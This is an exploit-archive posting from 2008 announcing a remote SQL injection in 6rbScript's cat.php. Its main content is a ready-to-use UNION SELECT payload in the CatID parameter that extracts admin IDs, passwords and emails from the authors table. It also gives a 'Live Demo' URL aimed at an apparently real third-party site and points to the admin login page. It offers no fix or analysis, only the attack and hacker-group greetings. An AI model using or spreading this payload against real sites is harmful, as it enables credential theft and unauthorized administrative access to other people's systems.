Home / exploits 6rbscriptcat-sql.txt
Posted on 22 September 2008
$___________________________________________________/ $ $ 6rbScript (cat.php) Remote SQL Injection $ $___________________________________________________/ $ -- K -- $ $ Author: Karar_alshami $ $ Home: Google.Com $ $ email: Karar_alshame{aT}Yahoo{d0t}com $ $ $ $___________________________________________________/ $ -- K -- $ $ script : www.6rbscript.com $ $ Price! : 150$ $ $ DorK : "Try 2 Find it!" $___________________________________________________/ Exploit:\n------------ WwW..[localhost].com/script/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors-- Live Demo:\n----------------- http://www.qatarw.com/A/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors-- Admin LoGin :\n-------------------- WwW.[localhost].com/admin ____________________________-- Greetz --_________________________________/ $ $ All members 0f Mriraq.com/vb & www.iq-ty.com/vb $ $ All my frienDs & $ Hussin X $ S_DLA_S Th3 1r4Q1 $ GeNiUs IrAQI $ Fakar ali $ $ $ Bashar $ Iraqhack $ mos_chori $ $ h3 h3 $______________________________----____________________________________/
